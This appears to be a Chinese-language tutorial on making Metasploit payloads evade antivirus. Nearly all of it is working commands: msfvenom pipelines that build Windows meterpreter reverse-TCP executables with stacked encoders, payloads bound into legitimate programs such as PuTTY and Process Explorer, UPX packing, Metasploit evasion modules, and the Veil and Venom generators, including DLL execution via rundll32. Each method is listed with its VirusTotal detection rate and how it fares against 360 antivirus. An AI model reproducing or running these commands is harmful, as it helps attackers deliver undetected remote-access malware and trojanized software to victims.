MSF免杀
多重编码:54/70
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.237 lport=10000 -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i 10 -f raw | msfvenom -e x86/countdown -a x86 --platform windows -i 10 -f exe -o 123.exe
自定义可执行文件的模板:36/70
https://download.sysinternals.com/files/ProcessExplorer.zip
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.237 lport=10000 -e x86/shikata_ga_nai -x /home/kali/ProcessExplorer/procexp.exe -i 5 -f exe -o 123.exe
⾃捆绑:39/69
https://the.earth.li/~sgtatham/putty/0.67/x86/putty.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -x putty.exe -f exe -o payload3.exe
另外,能否免杀也和你选的被捆绑exe有⼀定关系,可以选微软的⼀些⼯具作为模板exe程序
⾃捆绑+编码:35/69
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -e x86/shikata_ga_nai -x putty.exe -i 15 -f exe -o payload4.exe
可修改-i编码次数,编码次数越多,⽣成的payload越可能免杀,经测试,编码5次和6次可免杀360。 在 virustotal.com 上查杀率为35/69
加壳:26/70
这里我用upx加壳:https://dl.pconline.com.cn/download/385120-1.html
组合免杀:多重编码+自定义+加壳 25/70
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.237 lport=10000 -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i 10 -f raw | msfvenom -e x86/countdown -a x86 --platform windows -x /home/kali/ProcessExplorer/procexp.exe -i 10 -f exe -o batmanfuture.exe
MSF-evasion模块免杀
show evasion # 查看信息
直接⽣成exe:41/69
使⽤ use windows/windows_defender_exe 进⾏⽣成payload
msf5 > use windows/windows_defender_exe
msf5 evasion(windows/windows_defender_exe) > set filename payload.exe
msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_exe) > set LHOST 10.211.55.3
msf5 evasion(windows/windows_defender_exe) > set LPORT 3333
msf5 evasion(windows/windows_defender_exe) > run
⽣成hta:28/59
使⽤ use evasion/windows/windows_defender_js_hta 进⾏⽣成payload
msf5 > use windows/windows_defender_exe
msf5 evasion(windows/windows_defender_exe) > set filename payload.exe
msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp
msf5 evasion(windows/windows_defender_exe) > set LHOST 10.211.55.3
msf5 evasion(windows/windows_defender_exe) > set LPORT 3333
msf5 evasion(windows/windows_defender_exe) > run
Veil
# 进入veil
docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil
# 默认在/tmp/veil�output目录下
dk exec -it 4ae72dc914c9 /bin/bash # 进入veil
veil有两个免杀的⼯具,Evasion和Ordnance。
Ordnance可⽣成在Veil-Evasion中使⽤的shellcode,Evasion是⽤做⽂件免杀
Veil>: use 1 #选择Evasion功能
Veil/Evasion>: list #查看payload列表
使⽤ list 可以看到到41种stager
推荐使⽤以go和ruby语⾔encode的编码⽅式。像python这类的与⽤户有较⾼的交互就容易被查杀
veil直接⽣成exe:47/68
veil可以直接⽣成⽀持msf的payload,我们先试⼀下看看效果。
我们使⽤go语⾔⽣成msf的payload
Veil/Evasion>: use 16
设置监听地址和端口
set lhost 192.168.43.73
set lport 4444
generate
然后再设定好⽣成的payload的名称
比如:go_msf
在宿主机的 /tmp/veil-output/compiled/ ⽬录可直接看到⽣成的exe⽂件
查杀率高,360动态没过,静态过了
veil+mingw-w64:12/69(过360)
先⽤veil⽣成shellcode
use 1
use 7
set lhost 192.168.43.73
set lport 4444
generate
c_msf
生成了c_msf.c的shellcode后,把shellcode用gcc编译下
gcc -o payload10.exe c_msf.c -l ws2_32
git clone https://github.com/r00t-3xp10it/venom.git
Venom
1.从github上拖到本地
git clone https://github.com/r00t-3xp10it/venom.git
2.修改⽂件执⾏权限
cd venom
sudo chmod -R +x *.sh
sudo chmod -R +x *.py
3.安装依赖库和软件
cd aux
sudo ./setup.sh
4.运⾏venom
sudo ./venom.sh
在parrot系统中,root⽤户⽆法直接使⽤ systemctl start
apache2.service 开启apache等服务,必须普通⽤户才⾏
venom⽣成exe:30/70
我们先⽣成⼀个最简单直接的,第4个模块,通过C编译EXE程序
agent 4
venom⽣成bat:9/58
agent 1
rundll32.exe dll_msf.bat,main
venom⽣成dll:55/69
选择windows之后,在agent中选择第12个,⽣成dll,⽣成了 dll_msf.dll ⽂件
把⽂件拷⻉到测试机上,命令⾏中执⾏ rundll32.exe dll_msf.dll,main
msfvenom -p windows/meterpreter/reverse_tcp -e x64/xor_context -i 6 -b '\x00' lhost=192.168.43.237 lport=10001 -f c -o shell.c
x64/zutto_dekiru
msfvenom -p windows/meterpreter/reverse_tcp -b '\x00' lhost=192.168.43.237 lport=10001 -f c -o shell123.c